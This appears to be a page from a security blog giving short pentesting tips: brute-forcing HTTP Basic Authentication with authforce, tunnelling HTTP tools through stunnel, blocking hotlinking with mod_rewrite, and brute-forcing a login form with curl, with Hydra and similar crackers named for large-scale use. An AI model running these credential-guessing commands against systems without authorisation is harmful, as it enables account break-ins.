Authforce is a very fast tool for brute forcing HTTP Basic Authentication protected URLs. In HTTP Basic authentication the username and password is Base64 encoded and passed along with the HTTP headers from the client to the HTTP server. This means that the credentials are passed over the network in plaintext and is vulnerable to eavesdropping by an attacker. Despite this weakness, it is still quite widely used - for example access to the default Tomcat manager page is protected by HTTP Basic by default.

When a client requests a HTTP Basic-protected resource, the web server will challenge with a HTTP 401 Authorization Required (See www.w3.org's page for a listing of all HTTP codes) which causes a username/password dialog to pop up in your browser. Now you've identified the target URL for authforce to run against.

Authforce needs a list of usernames, a list of passwords, and target URL to work. Here's an example:

authforce --verbose --beep --logfile=aftest --username-file=users --password-file=words http://192.168.1.100/tmp

authforce will show you the current username and password being tried in realtime. If it gets a match you will see something like this:

match [goonda:mysecretpass]

Note that authforce will work against both http and https URLs, however you will need to add the --no-ssl-fail option if the site uses self-signed certificates. Happy Hacking!

[ add comment ] ( 1189 views )   |  permalink

---

Stunnel is a very handy utility for wrapping virtually any service in SSL. In a pentesting perspective its especially handy if you want to use a tool which only speaks HTTP (e.g. a perl LWP script which you are too lazy to make speak SSL, or want to make manual HTTP requests adhoc ;). We can setup a tunnel to our target SSL webserver, and have it bind to a local port we can use for access. NOTE: This only applies to stunnel version 3.x, 4.x uses an stunnel.conf file instead of command line switches.

For example, if our target webserver is called example.foo.com, with a webserver running SSL on port 443, we would run the following command to bind to a local high port e.g. 10666. If you attempted to bind to a local port below 1024, you would have to run this command as root:

stunnel -d localhost:10666 -c -r example.foo.com:443

To confirm that its working, first check the log (usually /var/log/messages, but /var/log/daemon.log on my system).

Mar 7 20:20:32 localhost stunnel[22933]: Using 'example.foo.com.10666' as tcpwrapper service name
Mar 7 20:20:32 localhost stunnel[22933]: stunnel 3.26 on i486-pc-linux-gnu PTHREAD+LIBWRAP with OpenSSL 0.
9.8c 05 Sep 2006
Mar 7 20:20:32 localhost stunnel[22934]: FD_SETSIZE=1024, file ulimit=1024 -> 500 clients allowed

So now our stunnel daemon process is listening on localhost, port 10666, ready to service our requests! Lets try it out by doing a simple HEAD request on the target webserver:

user@host# nc localhost 10666
HEAD / HTTP/1.0

HTTP/1.1 403 Forbidden
Date: Sat, 08 Mar 2008 01:12:44 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1

Excellent! I have also run password crackers like hydra through stunnel without problems, so it can take a beating. Happy Hacking!

[ add comment ] ( 1713 views )   |  permalink

---

mod_rewrite is a powerful module for Apache for performing URL rewriting on the fly. However sometimes if your regex kung-fu is not up to par, it can be a frustrating and hair-pulling exercise to figure out why your rewrite rules are not working. The solution is to add a couple logging lines into your httpd.conf or vhost stanza:


RewriteEngine On
RewriteLog "/var/log/apache/rewrite_log"
RewriteLogLevel 9
RewriteCond etc.


Once you've debugged your problem, its advisable to take these lines out as they can generate A LOT of logs. Another thing I noticed is that these RewriteLog directives only seem to work when placed in the main httpd.conf, not in .htaccess files despite "AllowOverride All".

I was trying to prevent hotlinking on this site. Basically that means someone who is linking directly to my images (and not to the page in which it is displayed). Essentially this amounts to bandwidth theft. To prevent this, I implemented the following mod_rewrite rules in .htaccess:


RewriteEngine on
RewriteCond %{REQUEST_FILENAME} \.(gif|jpg|js|css)$ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?goonda.org/.*$ [NC]
RewriteRule \.(gif|jpg|js|css)$ - [F]


This code prevents any non-blank referrer which does not originate from my website (goonda.org) to receive a 403 (Forbidden) message. Works great!

[ add comment ] ( 985 views )   |  permalink

---

cURL is a very useful utility to perform HTTP/HTTPS operations from the command line. Many times during a web application pentest you need to send an HTTP POST to a login form (e.g. brute force a login to the site). Here's the very simple way to do it, assuming you the form parameters are called username and password.

curl -d "username=SOMEUSER&password=SOMEPASS" -k https://some.website.com/loginform.jsp

The "-d" indicates you are including data for a POST, the -k says ignore SSL certificate warnings from the remote site.

Using curl is really only good for doing quick spot checks, to do large scale brute forcing I'd recommend using THC Hydra, the super useful perl module libwww-perl aka LWP, or Nessus which has incorporated Hydra. On Windows, Brutus works.

[ add comment ] ( 1149 views )   |  permalink

---

| 1 | 2 | 3 |

All information on this blog copyright Goonda Security Inc. - Page Generated in 0.159 seconds